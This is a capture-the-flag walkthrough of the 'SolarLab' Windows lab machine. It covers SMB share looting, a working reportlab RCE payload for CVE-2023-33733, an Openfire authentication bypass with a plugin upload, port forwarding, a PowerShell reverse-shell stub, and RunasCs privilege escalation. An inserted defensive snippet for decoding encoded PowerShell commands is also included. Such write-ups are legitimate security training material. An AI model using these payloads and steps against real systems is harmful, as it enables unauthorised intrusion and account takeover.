# SolarLab Writeup
Hello hackers, today I wanted to share a simple writeup of one of the Season 5 machines. Actually, Season 5 has been very sweet so far, because this time I am getting better at Windows machines, especially AD, and at some of the most difficult Linux machines.
## **Description:**
SolarLab is a medium-easy Windows machine from Season 5 by **LazyTitan23**, where we were required to hack it and get access to the Administrator account. What I love about this box is that it uses one of the exploits I did on a machine we hacked during Season 4 (Savage Lands); if I am not mistaken, the box was **JAB**.
Let the hack begin.

## SCANNING
I started by scanning the whole network with nmap.

## ENUMERATION
I ran nmap against all ports, because I didn't want to risk skipping anything, and waited for the full port scan to finish.
Then I enumerated one port after another.
### ENUMERATING PORT 80
```
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
```
From port 80 we can see a domain name (solarlab.htb) in the redirect as well as the HTTP server header; what mattered most to me was the domain. So I added it to my hosts file and browsed to it.

I didn't get much info, so I decided to brute force directories and subdomains at the same time and see what I would get.
Unfortunately, I only ended up with one subdomain, report.solarlab.htb; I didn't get any directory that was useful.
### ENUMERATING SMB
Since I saw the SMB port open, I decided to enumerate it as well, hoping to get some useful info.
```
┌──(alienx㉿alienX)-[~/Desktop/MACHINES/SOLARLAB]
└─$ smbclient -L 10.10.11.16
Password for [WORKGROUP\alienx]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
From this we can see that the other shares need credentials; the only one we could access anonymously was the 'Documents' share.

I decided to download a few of the documents and see if they were useful.
The document that gave me some juicy info was the 'details-file.xlsx' file.
```
Password for [WORKGROUP\alienx]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri May 17 05:02:39 2024
.. DR 0 Fri May 17 05:02:39 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
LPUJYTWMSH D 0 Fri May 17 05:02:39 2024
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1844829 blocks available
smb: \> mget details-file.xlsx
Get file details-file.xlsx? yes
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.0 KiloBytes/sec) (average 21.0 KiloBytes/sec)
smb: \> exit
```
From the Excel file we get some info such as usernames, passwords and emails (let's record them somewhere and continue with our enumeration). I decided to focus on the usernames and passwords first.
```
## from Documents
users & their pass
1. blake.byte (ThisCanB3typedeasily1@)
2. AlexanderK (danenacia9234n)
3. ClaudiaS (dadsfawe9dafkn)
```
I wasn't done with SMB, LOL. So I went again and tried crackmapexec; crackmapexec is a nice enumeration tool, and instead of smbclient we can use it to do all those things.
I checked for users but got nothing, so I decided to brute force RIDs instead:
```
crackmapexec smb 10.10.11.16 -u 'user' -p 'PASS' --rid-brute
SMB 10.10.11.16 445 SOLARLAB [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.10.11.16 445 SOLARLAB [+] solarlab\user:PASS
SMB 10.10.11.16 445 SOLARLAB [+] Brute forcing RIDs
SMB 10.10.11.16 445 SOLARLAB 500: SOLARLAB\Administrator (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 501: SOLARLAB\Guest (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 513: SOLARLAB\None (SidTypeGroup)
SMB 10.10.11.16 445 SOLARLAB 1000: SOLARLAB\blake (SidTypeUser)
SMB 10.10.11.16 445 SOLARLAB 1001: SOLARLAB\openfire (SidTypeUser)
```
N/B: After analyzing my data I decided to connect some dots. From smbclient I got an Excel file with some usernames, one of which was 'blake'; now, after using crackmapexec, I get the same user, so this means we need to find somewhere we can log in with this user. My next guess came from the crackmapexec output, where I can see a user '**openfire**'. What I know is that once you see an openfire user, you should expect an Openfire service listening internally on port 9090 or 9091 on the server, so once inside the machine you will have to do some pivoting to reach that service, which is also likely vulnerable.
This openfire user gave me a clue that once I got access inside the machine, my next step would be pivoting (that was my general overview once I saw this user). Now let's see how this goes.
### ENUMERATING PORT 6791
```
6791/tcp open http syn-ack nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Here we find a subdomain and a port number. I added it to my hosts file and gave it a try.
```
url: http://report.solarlab.htb:6791/
```

Now we have a ReportHub interface, but we need valid credentials to log in.
I tried the creds from the Excel file, but they didn't work, so I tried harder and made a small twist on the username, from "blake" to "blakeb":
Creds
```
1. blake.byte (ThisCanB3typedeasily1@)
username: blakeb
password:ThisCanB3typedeasily1@
```
Now we can log in.

ReportHub is used to generate a PDF file by uploading either an image or an HTML file.
A little Google search about ReportHub vulnerabilities led me to this one on GitHub: [CVE-2023-33733](https://github.com/c53elyas/CVE-2023-33733).

After analyzing each endpoint with Burp, I found two endpoints that could get us to the same goal, which was RCE.

With '**leaverequest**' there is a file upload vulnerability, but I will go with a simpler method here: the endpoint that was easiest to exploit was '**travelRequest**'.

After checking the Burp Suite history, I sent this request to Repeater.

Now, at the bottom of the CVE repository above there is a PoC, which I decided to edit and use.

The PoC says we can create a malicious file.html and put our malicious HTML code inside, which exploits the Python library (reportlab) that renders the PDF. So instead of creating a file to upload, I am going to put my PowerShell payload directly in the request; no need to upload anything.
payload:
```
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('payload here') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
```
## EXPLOITATION
### EXPLOITING reportHub
I went and grabbed the base64-encoded PowerShell script and added it to the payload.
Finally my payload looked like this after beautifying it like a noob, LOL. There is a simple technique you need to use while encoding, otherwise you won't get a shell (thanks to **@blackninja23**, who took his time those days to teach me this and made sure I understood this method of encoding a PowerShell script, because I was struggling with it for a long time); just do a simple Google search.

Now let's get a shell.


In blake's home directory you can grab your user flag.
## LATERAL MOVEMENT
For lateral movement I started checking for interesting users and local groups, but nothing was useful here apart from the openfire user.

The only interesting user here was "**openfire**". What we had to do was first get a shell as "**openfire**" using some pivoting technique, and then find a way to get to Administrator.
I didn't even need to Google here, because I know the Openfire service runs internally on ports "9090 and 9091"; I confirmed this with the commands below.
```
PS C:\users\blake\desktop> netstat -ano | findstr "9090"
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2244
PS C:\users\blake\desktop> netstat -ano | findstr "9090"
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2244
PS C:\users\blake\desktop> netstat -ano | findstr "9091"
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 2244
PS C:\users\blake\desktop>
```

I knew straight away that in order to reach ports "9090 and 9091" I needed to do some port forwarding, and that is where pivoting comes in. We can't reach these ports directly because they are only listening on the loopback interface of the target, so the only path for me was through the computer I already had access to (blake's computer).
## PIVOTING
### uploading chisel
I am going to use chisel on both my local machine and the target machine.

I decided to get multiple shells, so that if one crashes I can use the others.
I will forward both ports 9090 and 9091 to my local machine.

Let's try to access these ports and see if the Openfire service is really running there.
```
url:http://127.0.0.1:9090/login.jsp?url=%2Findex.jsp
```

### Exploiting openfire
So far we have the Openfire service reachable from our local machine, and the good news is that this Openfire version is vulnerable to an authentication bypass, which leads to remote code execution by uploading a malicious plugin; simple as that. All this I learned in Season 4, from the JAB machine.
```
Openfire, Version: 4.7.4
```
Google-fu found CVE-2023-32315, and I decided to clone the exploit.

I ran the exploit in order to create a valid administrator username and password.

Use the generated credentials to log in to Openfire.

N/B: the Python script for this CVE generates a random username and password, but if you understand what the script does inside, you can modify it to generate the username and password of your choice.
### Getting a shell as openfire.
First of all we need to upload a plugin, which gives us a password we will use to access the console. You may find it difficult, but it is very easy if you have done the JAB machine.

### upload a vulnerable plugin
Then I uploaded the plugin; it is a Java plugin, because Openfire is written in Java.

After uploading, I was good to go.

The plugin shows you the location (Management Tool) where you can find it, and also gives you the password, i.e. "**123**".
The easiest way to find the plugin is: Server ---> Server Settings ---> Management Tool.

Now let's find a console: open the plugin's home page and then System Command.

From here I was able to execute commands as openfire.

### getting a reverse shell
Let's get a proper shell, because this environment is limited. As usual I beautified my PowerShell payload and at the same time started the listener on my local machine.
payload:
```
powershell -e YourPayloadHere
```
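The encoding step mentioned above for the `powershell -e` payload is what powershell.exe expects for `-EncodedCommand`: base64 of the script as UTF-16LE text. From the defender's side, the same fact is what lets an analyst read such command lines out of process-creation logs. The following is an added example written for this writeup, not code from the original post; the `4688`-style log layout, the sample script and the function names are constructed assumptions.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so -e, -ec
# and -enc all carry an encoded script. The log field layout is an assumption.
ENCODED_FLAG = re.compile(r"^[-/]e(?:c|nc|ncodedcommand)?$", re.IGNORECASE)
CMDLINE_FIELD = re.compile(r"Process Command Line:\s*(.+?)\s*$")


def _plausible_script(text: str) -> bool:
    """Heuristic: a real script is almost entirely printable ASCII or whitespace."""
    ok = sum(1 for ch in text if ch.isascii() and (ch.isprintable() or ch.isspace()))
    return bool(text) and ok / len(text) > 0.9


def decode_blob(value: str):
    """Decode one -e argument as powershell.exe does (base64 of UTF-16LE text).

    Returns (encoding, script). The UTF-8 fallback catches the classic mistake of
    base64-encoding plain ASCII, which PowerShell will not run but is still worth
    reading during triage.
    """
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if _plausible_script(text):
            return (encoding, text)
    return None


def decode_encoded_command(cmdline: str):
    """Locate the encoded-command flag on a command line and decode its argument."""
    args = cmdline.split()
    for flag, value in zip(args, args[1:]):
        if ENCODED_FLAG.match(flag):
            return decode_blob(value)
    return None


def triage_log_line(line: str):
    """Extract the command line from a 4688-style log line and decode it."""
    match = CMDLINE_FIELD.search(line)
    return decode_encoded_command(match.group(1)) if match else None


# Constructed samples: a benign script encoded correctly, then encoded the wrong way.
SAMPLE_SCRIPT = "Write-Output 'constructed sample'"
GOOD_LINE = ("4688 Process Command Line: powershell -nop -w hidden -e "
             + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())
BAD_LINE = ("4688 Process Command Line: powershell -enc "
            + base64.b64encode(SAMPLE_SCRIPT.encode("utf-8")).decode())
```

The second sample decodes only through the UTF-8 fallback, which is exactly the mis-encoded case in which PowerShell would not run the script.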

How sweet this machine was; it was really fun and interesting.
## PRIVILEGE ESCALATION
Privilege escalation was also interesting. I don't know whether I did it the intended way or not; I will have to find "**LazyTitan23**" himself and ask him after the machine retires.
### privilege escalation and runas script
I didn't find much info about the openfire user after reaching here.

But while I was in "Program Files" looking for any juicy program to exploit, I got the idea of trying the RunasCs script, and decided to give it a try.
My idea was this: since I have **blake**'s password, I can use this **password** with the **RunasCs** script to execute a command and see which user the system responds as.
i.e.

As you can see, I successfully executed commands as Administrator; now let's get a shell as Administrator.
### uploading nc binary

Then I listened on port 1234 on my local machine.


```
C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 385E-AC57
Directory of c:\Users\Administrator\Desktop
05/03/2024 02:32 PM <DIR> .
05/03/2024 02:32 PM <DIR> ..
05/17/2024 10:38 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,737,708,544 bytes free
c:\Users\Administrator\Desktop>
```
